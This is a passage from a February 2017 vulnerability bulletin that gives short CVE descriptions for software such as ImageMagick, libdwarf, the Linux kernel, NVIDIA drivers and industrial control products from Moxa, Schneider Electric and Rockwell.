An issue was discovered in icoutils 0.31.1. A buffer overflow was observed in the "extract_icons" function in the "extract.c" source file. This issue can be triggered by processing a corrupted ico file and will result in an icotool crash. 2017-02-16 not yet calculated CVE-2017-6010
MISC
icoutils — icoutils
 
An issue was discovered in icoutils 0.31.1. An out-of-bounds read leading to a buffer overflow was observed in the "simple_vec" function in the "extract.c" source file. This affects icotool. 2017-02-16 not yet calculated CVE-2017-6011
MISC
ikiwiki — ikiwiki
 
ikiwiki 3.20161219 does not properly check if a revision changes the access permissions for a page on sites with the git and recentchanges plugins and the CGI interface enabled, which allows remote attackers to revert certain changes by leveraging permissions to change the page before the revision was made. 2017-02-13 not yet calculated CVE-2016-10026
CONFIRM
MLIST
MLIST
CONFIRM
imagemagick — imagemagick
 
Heap-based buffer overflow in the IsPixelGray function in MagickCore/pixel-accessor.h in ImageMagick 7.0.3.8 allows remote attackers to cause a denial of service (out-of-bounds heap read) via a crafted image file. NOTE: this vulnerability exists because of an incomplete fix for CVE-2016-9556. 2017-02-16 not yet calculated CVE-2016-9773
MLIST
MLIST
MLIST
MISC
imagemagick — imagemagick
 
The IsPixelMonochrome function in MagickCore/pixel-accessor.h in ImageMagick 7.0.3.0 allows remote attackers to cause a denial of service (out-of-bounds read and crash) via a crafted file. NOTE: the vendor says "This is a Q64 issue and we do not support Q64." 2017-02-15 not yet calculated CVE-2016-8678
MLIST
MLIST
BID
CONFIRM
MISC
imagemagick — imagemagick
 
The AcquireQuantumPixels function in MagickCore/quantum.c in ImageMagick before 7.0.3-1 allows remote attackers to have unspecified impact via a crafted image file, which triggers a memory allocation failure. 2017-02-15 not yet calculated CVE-2016-8677
SUSE
DEBIAN
MLIST
BID
MISC
CONFIRM
CONFIRM
CONFIRM
integraxor — ecava
 
An issue was discovered in Ecava IntegraXor Version 5.0.413.0. The Ecava IntegraXor web server has parameters that are vulnerable to SQL injection. If the queries are not sanitized, the host’s database could be subject to read, write, and delete commands. 2017-02-13 not yet calculated CVE-2016-8341
BID
MISC
interschalt — vdr
 
An issue was discovered in INTERSCHALT Maritime Systems VDR G4e Versions 5.220 and prior. External input is used to construct paths to files and directories without properly neutralizing special elements within the pathname that could allow an attacker to read files on the system, a Path Traversal. 2017-02-13 not yet calculated CVE-2016-9339
BID
MISC
kabona — webdatorcentral
 
An issue was discovered in Kabona AB WebDatorCentral (WDC) application prior to Version 3.4.0. WDC does not limit authentication attempts that may allow a brute force attack method. 2017-02-13 not yet calculated CVE-2016-8347
BID
MISC
libdwarf — libdwarf
 
The _dwarf_read_line_table_header function in dwarf_line_table_reader.c in libdwarf before 20160923 allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted file. 2017-02-17 not yet calculated CVE-2016-5035
MLIST
MLIST
CONFIRM
libdwarf — libdwarf
 
The print_exprloc_content function in libdwarf before 20160923 allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted file. 2017-02-17 not yet calculated CVE-2016-5033
MLIST
MLIST
CONFIRM
libdwarf — libdwarf
 
The _dwarf_calculate_info_section_end_ptr function in libdwarf before 20160923 allows remote attackers to cause a denial of service (NULL pointer dereference) via a crafted file. 2017-02-17 not yet calculated CVE-2016-5030
MLIST
MLIST
CONFIRM
libdwarf — libdwarf
 
The WRITE_UNALIGNED function in dwarf_elf_access.c in libdwarf before 20160923 allows remote attackers to cause a denial of service (out-of-bounds write and crash) via a crafted DWARF section. 2017-02-17 not yet calculated CVE-2016-5044
MLIST
MLIST
CONFIRM
libdwarf — libdwarf
 
dwarf_elf_access.c in libdwarf before 20160923 allows remote attackers to cause a denial of service (out-of-bounds write) via a crafted file, related to relocation records. 2017-02-17 not yet calculated CVE-2016-5034
MLIST
MLIST
CONFIRM
libdwarf — libdwarf
 
The dwarf_get_xu_hash_entry function in libdwarf before 20160923 allows remote attackers to cause a denial of service (crash) via a crafted file. 2017-02-17 not yet calculated CVE-2016-5032
MLIST
MLIST
CONFIRM
libdwarf — libdwarf
 
The print_frame_inst_bytes function in libdwarf before 20160923 allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted file. 2017-02-17 not yet calculated CVE-2016-5031
MLIST
MLIST
CONFIRM
libdwarf — libdwarf
 
The _dwarf_load_section function in libdwarf before 20160923 allows remote attackers to cause a denial of service (NULL pointer dereference) via a crafted file. 2017-02-17 not yet calculated CVE-2016-5037
MLIST
MLIST
CONFIRM
libdwarf — libdwarf
 
The dump_block function in print_sections.c in libdwarf before 20160923 allows remote attackers to cause a denial of service (out-of-bounds read) via crafted frame data. 2017-02-17 not yet calculated CVE-2016-5036
MLIST
MLIST
CONFIRM
libdwarf — libdwarf
 
The read_line_table_program function in dwarf_line_table_reader_common.c in libdwarf before 20160923 allows remote attackers to cause a denial of service (out-of-bounds read) via crafted input. 2017-02-17 not yet calculated CVE-2016-7510
MISC
CONFIRM
libdwarf — libdwarf
 
The get_attr_value function in libdwarf before 20160923 allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted object with all-bits on. 2017-02-17 not yet calculated CVE-2016-5039
MLIST
MLIST
CONFIRM
libdwarf — libdwarf
 
The dwarf_get_macro_startend_file function in dwarf_macro5.c in libdwarf before 20160923 allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted string offset for .debug_str. 2017-02-17 not yet calculated CVE-2016-5038
MLIST
MLIST
CONFIRM
libdwarf — libdwarf
 
Integer overflow in the dwarf_die_deliv.c in libdwarf 20160613 allows remote attackers to cause a denial of service (crash) via a crafted file. 2017-02-17 not yet calculated CVE-2016-7511
CONFIRM
CONFIRM
libdwarf — libdwarf
 
The create_fullest_file_path function in libdwarf before 20160923 allows remote attackers to cause a denial of service (NULL pointer dereference) via a crafted dwarf file. 2017-02-17 not yet calculated CVE-2016-5029
MLIST
MLIST
CONFIRM
libdwarf — libdwarf
 
The dwarf_dealloc function in libdwarf before 20160923 allows remote attackers to cause a denial of service (out-of-bounds read and crash) via a crafted DWARF section. 2017-02-17 not yet calculated CVE-2016-5043
MLIST
MLIST
CONFIRM
libdwarf — libdwarf
 
The _dwarf_get_size_of_val function in libdwarf/dwarf_util.c in Libdwarf before 20161124 allows remote attackers to cause a denial of service (out-of-bounds read) by calling the dwarfdump command on a crafted file. 2017-02-15 not yet calculated CVE-2016-8679
MLIST
BID
MISC
CONFIRM
libdwarf — libdwarf
 
The print_frame_inst_bytes function in libdwarf before 20160923 allows remote attackers to cause a denial of service (NULL pointer dereference) via an object file with empty bss-like sections. 2017-02-17 not yet calculated CVE-2016-5028
MLIST
MLIST
CONFIRM
libdwarf — libdwarf
 
The _dwarf_get_abbrev_for_code function in dwarf_util.c in libdwarf 20161001 and earlier allows remote attackers to cause a denial of service (out-of-bounds read) by calling the dwarfdump command on a crafted file. 2017-02-15 not yet calculated CVE-2016-8680
MLIST
BID
MISC
CONFIRM
CONFIRM
libdwarf — libdwarf
 
libdwarf before 20160923 allows remote attackers to cause a denial of service (out-of-bounds read and crash) via a large length value in a compilation unit header. 2017-02-17 not yet calculated CVE-2016-5040
MLIST
MLIST
CONFIRM
libdwarf — libdwarf
 
The _dwarf_get_abbrev_for_code function in dwarf_util.c in libdwarf 20161001 and earlier allows remote attackers to cause a denial of service (out-of-bounds read) by calling the dwarfdump command on a crafted file. 2017-02-15 not yet calculated CVE-2016-8681
MLIST
BID
MISC
CONFIRM
libdwarf — libdwarf
 
The dwarf_get_aranges_list function in libdwarf before 20160923 allows remote attackers to cause a denial of service (infinite loop and crash) via a crafted DWARF section. 2017-02-17 not yet calculated CVE-2016-5042
MLIST
MLIST
CONFIRM
CONFIRM
libjpeg — libjpeg
 
The cjpeg utility in libjpeg allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) or execute arbitrary code via a crafted file. 2017-02-13 not yet calculated CVE-2016-3616
CONFIRM
CONFIRM
libtomcrypt — libtomcrypt
 
The rsa_verify_hash_ex function in rsa_verify_hash.c in LibTomCrypt, as used in OP-TEE before 2.2.0, does not validate that the message length is equal to the ASN.1 encoded data length, which makes it easier for remote attackers to forge RSA signatures or public certificates by leveraging a Bleichenbacher signature forgery attack. 2017-02-13 not yet calculated CVE-2016-6129
CONFIRM
CONFIRM
CONFIRM
linux — linux_kernel
 
The TCP stack in the Linux kernel 3.x does not properly implement a SYN cookie protection mechanism for the case of a fast network connection, which allows remote attackers to cause a denial of service (CPU consumption) by sending many TCP SYN packets, as demonstrated by an attack against the kernel-3.10.0 package in CentOS Linux 7. 2017-02-14 not yet calculated CVE-2017-5972
MISC
MISC
linux — linux_kernel
 
Race condition in kernel/events/core.c in the Linux kernel before 4.9.7 allows local users to gain privileges via a crafted application that makes concurrent perf_event_open system calls for moving a software group into a hardware context. NOTE: this vulnerability exists because of an incomplete fix for CVE-2016-6786. 2017-02-18 not yet calculated CVE-2017-6001
CONFIRM
CONFIRM
MLIST
CONFIRM
CONFIRM
linux — linux_kernel
 
Race condition in the sctp_wait_for_sndbuf function in net/sctp/socket.c in the Linux kernel before 4.9.11 allows local users to cause a denial of service (assertion failure and panic) via a multithreaded application that peels off an association in a certain buffer-full state. 2017-02-18 not yet calculated CVE-2017-5986
CONFIRM
CONFIRM
MLIST
CONFIRM
CONFIRM
linux — linux_kernel
 
The dccp_rcv_state_process function in net/dccp/input.c in the Linux kernel through 4.9.11 mishandles DCCP_PKT_REQUEST packet data structures in the LISTEN state, which allows local users to cause a denial of service (invalid free) or possibly have unspecified other impact via an application that makes an IPV6_RECVPKTINFO setsockopt system call. 2017-02-18 not yet calculated CVE-2017-6074
CONFIRM
locus_energy — l_gate
 
An issue was discovered in Locus Energy LGate prior to 1.05H, LGate 50, LGate 100, LGate 101, LGate 120, and LGate 320. Locus Energy meters use a PHP script to manage the energy meter parameters for voltage monitoring and network configuration. The PHP code does not properly validate information that is sent in the POST request. 2017-02-13 not yet calculated CVE-2016-5782
BID
BID
MISC
mantisbt — mantisbt
 
MantisBT before 1.3.1 and 2.x before 2.0.0-beta.2 uses a weak Content Security Policy when using the Gravatar plugin, which allows remote attackers to conduct cross-site scripting (XSS) attacks via unspecified vectors. 2017-02-17 not yet calculated CVE-2016-7111
MLIST
MLIST
CONFIRM
CONFIRM
mantisbt — mantisbt
 
Cross-site scripting (XSS) vulnerability in manage_custom_field_edit_page.php in MantisBT 1.2.19 and earlier allows remote attackers to inject arbitrary web script or HTML via the return parameter. 2017-02-17 not yet calculated CVE-2016-5364
MLIST
CONFIRM
CONFIRM
CONFIRM
mcafee — intel_security_mcafee_agent
 
Unvalidated parameter vulnerability in the remote log viewing capability in Intel Security McAfee Agent 5.0.x versions prior to 5.0.4.449 allows remote attackers to pass unexpected input parameters via a URL that was not completely validated. 2017-02-13 not yet calculated CVE-2017-3896
BID
CONFIRM
mitsubishi — melsec-q
 
An issue was discovered in Mitsubishi Electric Automation MELSEC-Q series Ethernet interface modules QJ71E71-100, all versions, QJ71E71-B5, all versions, and QJ71E71-B2, all versions. The affected Ethernet interface module is connected to a MELSEC-Q PLC, which may allow a remote attacker to connect to the PLC via Port 5002/TCP and cause a denial of service, requiring the PLC to be reset to resume operation. This is caused by an Unrestricted Externally Accessible Lock. 2017-02-13 not yet calculated CVE-2016-8368
BID
MISC
mitsubishi — melsec-q
 
An issue was discovered in Mitsubishi Electric Automation MELSEC-Q series Ethernet interface modules QJ71E71-100, all versions, QJ71E71-B5, all versions, and QJ71E71-B2, all versions. Weakly encrypted passwords are transmitted to a MELSEC-Q PLC. 2017-02-13 not yet calculated CVE-2016-8370
BID
MISC
moxa — edr_810
 
An issue was discovered in Moxa EDR-810 Industrial Secure Router. By accessing a specific uniform resource locator (URL) on the web server, a malicious user is able to access configuration and log files (PRIVILEGE ESCALATION). 2017-02-13 not yet calculated CVE-2016-8346
BID
MISC
moxa — iologik
 
An issue was discovered in Moxa ioLogik E1210, firmware Version V2.4 and prior, ioLogik E1211, firmware Version V2.3 and prior, ioLogik E1212, firmware Version V2.4 and prior, ioLogik E1213, firmware Version V2.5 and prior, ioLogik E1214, firmware Version V2.4 and prior, ioLogik E1240, firmware Version V2.3 and prior, ioLogik E1241, firmware Version V2.4 and prior, ioLogik E1242, firmware Version V2.4 and prior, ioLogik E1260, firmware Version V2.4 and prior, ioLogik E1262, firmware Version V2.4 and prior, ioLogik E2210, firmware versions prior to V3.13, ioLogik E2212, firmware versions prior to V3.14, ioLogik E2214, firmware versions prior to V3.12, ioLogik E2240, firmware versions prior to V3.12, ioLogik E2242, firmware versions prior to V3.12, ioLogik E2260, firmware versions prior to V3.13, and ioLogik E2262, firmware versions prior to V3.12. A password is transmitted in a format that is not sufficiently secure. 2017-02-13 not yet calculated CVE-2016-8372
BID
MISC
moxa — iologik
 
An issue was discovered in Moxa ioLogik E1210, firmware Version V2.4 and prior, ioLogik E1211, firmware Version V2.3 and prior, ioLogik E1212, firmware Version V2.4 and prior, ioLogik E1213, firmware Version V2.5 and prior, ioLogik E1214, firmware Version V2.4 and prior, ioLogik E1240, firmware Version V2.3 and prior, ioLogik E1241, firmware Version V2.4 and prior, ioLogik E1242, firmware Version V2.4 and prior, ioLogik E1260, firmware Version V2.4 and prior, ioLogik E1262, firmware Version V2.4 and prior, ioLogik E2210, firmware versions prior to V3.13, ioLogik E2212, firmware versions prior to V3.14, ioLogik E2214, firmware versions prior to V3.12, ioLogik E2240, firmware versions prior to V3.12, ioLogik E2242, firmware versions prior to V3.12, ioLogik E2260, firmware versions prior to V3.13, and ioLogik E2262, firmware versions prior to V3.12. The web application fails to sanitize user input, which may allow an attacker to inject script or execute arbitrary code (CROSS-SITE SCRIPTING). 2017-02-13 not yet calculated CVE-2016-8359
BID
MISC
moxa — iologik
 
An issue was discovered in Moxa ioLogik E1210, firmware Version V2.4 and prior, ioLogik E1211, firmware Version V2.3 and prior, ioLogik E1212, firmware Version V2.4 and prior, ioLogik E1213, firmware Version V2.5 and prior, ioLogik E1214, firmware Version V2.4 and prior, ioLogik E1240, firmware Version V2.3 and prior, ioLogik E1241, firmware Version V2.4 and prior, ioLogik E1242, firmware Version V2.4 and prior, ioLogik E1260, firmware Version V2.4 and prior, ioLogik E1262, firmware Version V2.4 and prior, ioLogik E2210, firmware versions prior to V3.13, ioLogik E2212, firmware versions prior to V3.14, ioLogik E2214, firmware versions prior to V3.12, ioLogik E2240, firmware versions prior to V3.12, ioLogik E2242, firmware versions prior to V3.12, ioLogik E2260, firmware versions prior to V3.13, and ioLogik E2262, firmware versions prior to V3.12. Users are restricted to using short passwords. 2017-02-13 not yet calculated CVE-2016-8379
BID
MISC
moxa — iologik
 
An issue was discovered in Moxa ioLogik E1210, firmware Version V2.4 and prior, ioLogik E1211, firmware Version V2.3 and prior, ioLogik E1212, firmware Version V2.4 and prior, ioLogik E1213, firmware Version V2.5 and prior, ioLogik E1214, firmware Version V2.4 and prior, ioLogik E1240, firmware Version V2.3 and prior, ioLogik E1241, firmware Version V2.4 and prior, ioLogik E1242, firmware Version V2.4 and prior, ioLogik E1260, firmware Version V2.4 and prior, ioLogik E1262, firmware Version V2.4 and prior, ioLogik E2210, firmware versions prior to V3.13, ioLogik E2212, firmware versions prior to V3.14, ioLogik E2214, firmware versions prior to V3.12, ioLogik E2240, firmware versions prior to V3.12, ioLogik E2242, firmware versions prior to V3.12, ioLogik E2260, firmware versions prior to V3.13, and ioLogik E2262, firmware versions prior to V3.12. The web application may not sufficiently verify whether a request was provided by a valid user (CROSS-SITE REQUEST FORGERY). 2017-02-13 not yet calculated CVE-2016-8350
BID
MISC
moxa — moxa
 
An issue was discovered in Moxa MiiNePort E1 versions prior to 1.8, E2 versions prior to 1.4, and E3 versions prior to 1.1. An attacker may be able to brute force an active session cookie to be able to download configuration files. 2017-02-13 not yet calculated CVE-2016-9344
BID
MISC
moxa — moxa
 
An issue was discovered in Moxa MiiNePort E1 versions prior to 1.8, E2 versions prior to 1.4, and E3 versions prior to 1.1. Configuration data are stored in a file that is not encrypted. 2017-02-13 not yet calculated CVE-2016-9346
BID
MISC
moxa — oncell
 
An issue was discovered in Moxa OnCell OnCellG3470A-LTE, AWK-1131A/3131A/4131A Series, AWK-3191 Series, AWK-5232/6232 Series, AWK-1121/1127 Series, WAC-1001 V2 Series, WAC-2004 Series, AWK-3121-M12-RTG Series, AWK-3131-M12-RCC Series, AWK-5232-M12-RCC Series, TAP-6226 Series, AWK-3121/4121 Series, AWK-3131/4131 Series, and AWK-5222/6222 Series. User is able to execute arbitrary OS commands on the server. 2017-02-13 not yet calculated CVE-2016-8363
BID
MISC
moxa — oncell
 
An issue was discovered in Moxa OnCell OnCellG3470A-LTE, AWK-1131A/3131A/4131A Series, AWK-3191 Series, AWK-5232/6232 Series, AWK-1121/1127 Series, WAC-1001 V2 Series, WAC-2004 Series, AWK-3121-M12-RTG Series, AWK-3131-M12-RCC Series, AWK-5232-M12-RCC Series, TAP-6226 Series, AWK-3121/4121 Series, AWK-3131/4131 Series, and AWK-5222/6222 Series. Any user is able to download log files by accessing a specific URL. 2017-02-13 not yet calculated CVE-2016-8362
BID
MISC
navidia — navidia All versions of NVIDIA GPU and GeForce Experience installer contain a vulnerability where it fails to set proper permissions on the package extraction path thus allowing a non-privileged user to tamper with the extracted files, potentially leading to escalation of privileges via code execution. 2017-02-15 not yet calculated CVE-2017-0317
CONFIRM
navidia — navidia All versions of NVIDIA Windows GPU Display Driver contain a vulnerability in the kernel mode layer handler where improper handling of values may cause a denial of service on the system. 2017-02-15 not yet calculated CVE-2017-0319
CONFIRM
navidia — navidia NVIDIA GPU Display Driver R378 contains a vulnerability in the kernel mode layer handler where improper access control may lead to denial of service or possible escalation of privileges. 2017-02-15 not yet calculated CVE-2017-0311
CONFIRM
navidia — navidia All versions of NVIDIA Windows GPU Display Driver contain a vulnerability in the kernel mode layer (nvlddmkm.sys) handler for DxgkDdiEscape where untrusted input is used for buffer size calculation leading to denial of service or escalation of privileges. 2017-02-15 not yet calculated CVE-2017-0308
CONFIRM
navidia — navidia
 
All versions of NVIDIA Windows GPU Display Driver contain a vulnerability in the kernel mode layer handler where a NULL pointer dereference caused by invalid user input may lead to denial of service or potential escalation of privileges. 2017-02-15 not yet calculated CVE-2017-0323
CONFIRM
navidia — navidia
 
All versions of NVIDIA GPU Display Driver contain a vulnerability in the kernel mode layer handler where a NULL pointer dereference caused by invalid user input may lead to denial of service or potential escalation of privileges. 2017-02-15 not yet calculated CVE-2017-0321
CONFIRM
navidia — navidia
 
All versions of NVIDIA Windows GPU Display Driver contain a vulnerability in the kernel mode layer handler where improper handling of values may cause a denial of service on the system. 2017-02-15 not yet calculated CVE-2017-0320
CONFIRM
navidia — navidia
 
All versions of NVIDIA Windows GPU Display Driver contain a vulnerability in the kernel mode layer (nvlddmkm.sys) handler for DxgkDdiEscapeID 0x100008b where user provided input is used as the limit for a loop may lead to denial of service or potential escalation of privileges 2017-02-15 not yet calculated CVE-2017-0312
CONFIRM
navidia — navidia
 
All versions of NVIDIA Windows GPU Display Driver contain a vulnerability in the kernel mode layer (nvlddmkm.sys) handler for DxgkDdiEscape where the size of an input buffer is not validated, leading to denial of service or potential escalation of privileges. 2017-02-15 not yet calculated CVE-2017-0324
CONFIRM
navidia — navidia
 
All versions of NVIDIA Windows GPU Display Driver contain a vulnerability in the kernel mode layer (nvlddmkm.sys) handler where a value passed from a user to the driver is not correctly validated and used as the index to an array, leading to denial of service or potential escalation of privileges. 2017-02-15 not yet calculated CVE-2017-0322
CONFIRM
navidia — navidia
 
All versions of NVIDIA GPU Display Driver contain a vulnerability in the kernel mode layer handler where multiple integer overflows may cause improper memory allocation leading to a denial of service or potential escalation of privileges. 2017-02-15 not yet calculated CVE-2017-0309
CONFIRM
navidia — navidia
 
All versions of NVIDIA Windows GPU Display Driver contain a vulnerability in the kernel mode layer (nvlddmkm.sys) implementation of the SubmitCommandVirtual DDI (DxgkDdiSubmitCommandVirtual) where untrusted input is used to reference memory outside of the intended boundary of the buffer leading to denial of service or escalation of privileges. 2017-02-15 not yet calculated CVE-2017-0313
CONFIRM
navidia — navidia
 
All versions of NVIDIA GPU Display Driver contain a vulnerability in the kernel mode layer handler where improper access controls allowing unprivileged user to cause a denial of service. 2017-02-15 not yet calculated CVE-2017-0310
CONFIRM
navidia — navidia
 
All versions of NVIDIA Windows GPU Display Driver contain a vulnerability in the kernel mode layer (nvlddmkm.sys) handler for DxgkDdiEscape where an attempt to access an invalid object pointer may lead to denial of service or potential escalation of privileges. 2017-02-15 not yet calculated CVE-2017-0315
CONFIRM
navidia — navidia
 
All versions of NVIDIA Windows GPU Display Driver contain a vulnerability in the kernel mode layer (nvlddmkm.sys) implementation of the SubmitCommandVirtual DDI (DxgkDdiSubmitCommandVirtual) where untrusted input is used to reference memory outside of the intended boundary of the buffer leading to denial of service or escalation of privileges. 2017-02-15 not yet calculated CVE-2017-0314
CONFIRM
navidia — navidia
 
All versions of NVIDIA Linux GPU Display Driver contain a vulnerability in the kernel mode layer handler where improper validation of an input parameter may cause a denial of service on the system. 2017-02-15 not yet calculated CVE-2017-0318
CONFIRM
offis — dicom_dcmtk
 
Stack-based buffer overflow in the parsePresentationContext function in storescp in DICOM dcmtk-3.6.0 and earlier allows remote attackers to cause a denial of service (segmentation fault) via a long string sent to TCP port 4242. 2017-02-15 not yet calculated CVE-2015-8979
MISC
DEBIAN
MLIST
BID
MISC
CONFIRM
openssh — sshd
 
sshd in OpenSSH before 7.3, when SHA256 or SHA512 are used for user password hashing, uses BLOWFISH hashing on a static password when the username does not exist, which allows remote attackers to enumerate users by leveraging the timing difference between responses when a large password is provided. 2017-02-13 not yet calculated CVE-2016-6210
FULLDISC
BID
CONFIRM
osisoft — pi_coresight
 
An issue was discovered in OSIsoft PI Coresight 2016 R2 and earlier versions, and PI Web API 2016 R2 when deployed using the PI AF Services 2016 R2 integrated install kit. An information exposure through server log files vulnerability has been identified, which may allow service account passwords to become exposed for the affected services, potentially leading to unauthorized shutdown of the affected PI services as well as potential reuse of domain credentials. 2017-02-13 not yet calculated CVE-2017-5153
BID
MISC
osisoft — pi_web
 
An issue was discovered in OSIsoft PI Web API 2015 R2 (Version 1.5.1). There is a weakness in this product that may allow an attacker to access the PI system without the proper permissions. 2017-02-13 not yet calculated CVE-2016-8353
BID
MISC
perl — pcre
 
The compile_bracket_matchingpath function in pcre_jit_compile.c in PCRE through 8.x before revision 1680 (e.g., the PHP 7.1.1 bundled version) allows remote attackers to cause a denial of service (out-of-bounds read and application crash) via a crafted regular expression. 2017-02-16 not yet calculated CVE-2017-6004
CONFIRM
CONFIRM
perl — perl
 
The DBD::mysql module before 4.039 for Perl, when using server-side prepared statement support, allows attackers to cause a denial of service (out-of-bounds read) via vectors involving an unaligned number of placeholders in WHERE condition and output fields in SELECT expression. 2017-02-16 not yet calculated CVE-2016-1249
CONFIRM
MLIST
BID
CONFIRM
phoenix_contact — mguard
 
An issue was discovered on Phoenix Contact mGuard devices that have been updated to Version 8.4.0. When updating an mGuard device to Version 8.4.0 via the update-upload facility, the update will succeed, but it will reset the password of the admin user to its default value. 2017-02-13 not yet calculated CVE-2017-5159
BID
MISC
phreesoft — phreebookserp
 
An issue was discovered in PhreeBooksERP before 2017-02-13. The vulnerability exists due to insufficient filtration of user-supplied data in the "form" HTTP GET parameter passed to the "PhreeBooksERP-master/extensions/ShippingMethods/ups/label_mgr/js_include.php" and "PhreeBooksERP-master/extensions/ShippingMethods/yrc/label_mgr/js_include.php" URLs. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. NOTE: these js_include.php files do not exist in the SourceForge "stable release" (aka R37RC1). 2017-02-15 not yet calculated CVE-2017-5990
CONFIRM
CONFIRM
pkexec — pkexec
 
pkexec, when used with –user nonpriv, allows local users to escape to the parent session via a crafted TIOCSTI ioctl call, which pushes characters to the terminal’s input buffer. 2017-02-13 not yet calculated CVE-2016-2568
MLIST
CONFIRM
puppet_enterprise — mcollective
 
MCollective 2.7.0 and 2.8.x before 2.8.9, as used in Puppet Enterprise, allows remote attackers to execute arbitrary code via vectors related to the mco ping command. 2017-02-13 not yet calculated CVE-2016-2788
CONFIRM
puppet_enterprise — puppet_communications_protocol
 
The Puppet Communications Protocol in Puppet Enterprise 2015.3.x before 2015.3.3 does not properly validate certificates for the broker node, which allows remote non-whitelisted hosts to prevent runs from triggering via unspecified vectors. 2017-02-13 not yet calculated CVE-2016-2787
CONFIRM
python — pycrypto
 
Heap-based buffer overflow in the ALGnew function in block_templace.c in Python Cryptography Toolkit (aka pycrypto) allows remote attackers to execute arbitrary code as demonstrated by a crafted iv parameter to cryptmsg.py. 2017-02-15 not yet calculated CVE-2013-7459
MLIST
BID
CONFIRM
CONFIRM
CONFIRM
FEDORA
FEDORA
MISC
python — python
 
install.py in click allows remote attackers to gain privileges via a data tarball containing a file with a crafted path. 2017-02-13 not yet calculated CVE-2015-8768
UBUNTU
MLIST
CONFIRM
CONFIRM
rockwell_automation — logix5000
 
An issue was discovered in Rockwell Automation Logix5000 Programmable Automation Controller FRN 16.00 through 21.00 (excluding all firmware versions prior to FRN 16.00, which are not affected). By sending malformed common industrial protocol (CIP) packet, an attacker may be able to overflow a stack-based buffer and execute code on the controller or initiate a nonrecoverable fault resulting in a denial of service. 2017-02-13 not yet calculated CVE-2016-9343
BID
MISC
rockwell_automation — micrologix
 
An issue was discovered in Rockwell Automation Allen-Bradley MicroLogix 1100 controller 1763-L16AWA, Series A and B, Version 14.000 and prior versions; 1763-L16BBB, Series A and B, Version 14.000 and prior versions; 1763-L16BWA, Series A and B, Version 14.000 and prior versions; and 1763-L16DWD, Series A and B, Version 14.000 and prior versions. Because of an Incorrect Permission Assignment for Critical Resource, users with administrator privileges may be able to remove all administrative users requiring a factory reset to restore ancillary web server function. Exploitation of this vulnerability will still allow the affected device to function in its capacity as a controller. 2017-02-13 not yet calculated CVE-2016-9338
BID
MISC
rockwell_automation — micrologix
 
An issue was discovered in Rockwell Automation Allen-Bradley MicroLogix 1100 controller 1763-L16AWA, Series A and B, Version 14.000 and prior versions; 1763-L16BBB, Series A and B, Version 14.000 and prior versions; 1763-L16BWA, Series A and B, Version 14.000 and prior versions; and 1763-L16DWD, Series A and B, Version 14.000 and prior versions. User credentials are sent to the web server in clear text, which may allow an attacker to discover the credentials if they are able to observe traffic between the web browser and the server. 2017-02-13 not yet calculated CVE-2016-9334
BID
MISC
sap — sap
 
The SAP Message Server HTTP daemon in SAP KERNEL 7.21-7.49 allows remote attackers to cause a denial of service (memory consumption and process crash) via multiple msgserver/group?group= requests with a crafted size of the group parameter, aka SAP Security Note 2358972. 2017-02-15 not yet calculated CVE-2017-5997
MISC
sauter — novaweb
 
An issue was discovered in Sauter NovaWeb web HMI. The application uses a protection mechanism that relies on the existence or values of a cookie, but it does not properly ensure that the cookie is valid for the associated user. 2017-02-13 not yet calculated CVE-2016-10224
MISC
schneider_electric — connexium_firewalls An issue was discovered in Schneider Electric ConneXium firewalls TCSEFEC23F3F20 all versions, TCSEFEC23F3F21 all versions, TCSEFEC23FCF20 all versions, TCSEFEC23FCF21 all versions, and TCSEFEC2CF3F20 all versions. A stack-based buffer overflow can be triggered during the SNMP login authentication process that may allow an attacker to remotely execute code. 2017-02-13 not yet calculated CVE-2016-8352
BID
MISC
schneider_electric — ionxxxx
 
An issue was discovered on Schneider Electric IONXXXX series power meters ION73XX series, ION75XX series, ION76XX series, ION8650 series, ION8800 series, and PM5XXX series. No authentication is configured by default. An unauthorized user can access the device management portal and make configuration changes. 2017-02-13 not yet calculated CVE-2016-5815
BID
MISC
schneider_electric — ionxxxx
 
An issue was discovered on Schneider Electric IONXXXX series power meters ION73XX series, ION75XX series, ION76XX series, ION8650 series, ION8800 series, and PM5XXX series. There is no CSRF Token generated to authenticate the user during a session. Successful exploitation of this vulnerability can allow unauthorized configuration changes to be made and saved. 2017-02-13 not yet calculated CVE-2016-5809
BID
MISC
schneider_electric — magelis
 
An issue was discovered in Schneider Electric Magelis HMI Magelis GTO Advanced Optimum Panels, all versions, Magelis GTU Universal Panel, all versions, Magelis STO5xx and STU Small panels, all versions, Magelis XBT GH Advanced Hand-held Panels, all versions, Magelis XBT GK Advanced Touchscreen Panels with Keyboard, all versions, Magelis XBT GT Advanced Touchscreen Panels, all versions, and Magelis XBT GTW Advanced Open Touchscreen Panels (Windows XPe). An attacker may be able to disrupt a targeted web server, resulting in a denial of service because of UNCONTROLLED RESOURCE CONSUMPTION. 2017-02-13 not yet calculated CVE-2016-8374
BID
MISC
schneider_electric — magelis
 
An issue was discovered in Schneider Electric Magelis HMI Magelis GTO Advanced Optimum Panels, all versions, Magelis GTU Universal Panel, all versions, Magelis STO5xx and STU Small panels, all versions, Magelis XBT GH Advanced Hand-held Panels, all versions, Magelis XBT GK Advanced Touchscreen Panels with Keyboard, all versions, Magelis XBT GT Advanced Touchscreen Panels, all versions, and Magelis XBT GTW Advanced Open Touchscreen Panels (Windows XPe). An attacker can open multiple connections to a targeted web server and keep connections open preventing new connections from being made, rendering the web server unavailable during an attack. 2017-02-13 not yet calculated CVE-2016-8367
BID
MISC
schneider_electric — unity_pro
 
An issue was discovered in Schneider Electric Unity PRO prior to V11.1. Unity projects can be compiled as x86 instructions and loaded onto the PLC Simulator delivered with Unity PRO. These x86 instructions are subsequently executed directly by the simulator. A specially crafted patched Unity project file can make the simulator execute malicious code by redirecting the control flow of these instructions. 2017-02-13 not yet calculated CVE-2016-8354
BID
MISC
schnieder_electric — wonderware_historian
 
An issue was discovered in Schneider Electric Wonderware Historian 2014 R2 SP1 P01 and earlier. Wonderware Historian creates logins with default passwords, which can allow a malicious entity to compromise Historian databases. In some installation scenarios, resources beyond those created by Wonderware Historian may be compromised as well. 2017-02-13 not yet calculated CVE-2017-5155
BID
MISC
shadow — shadow
 
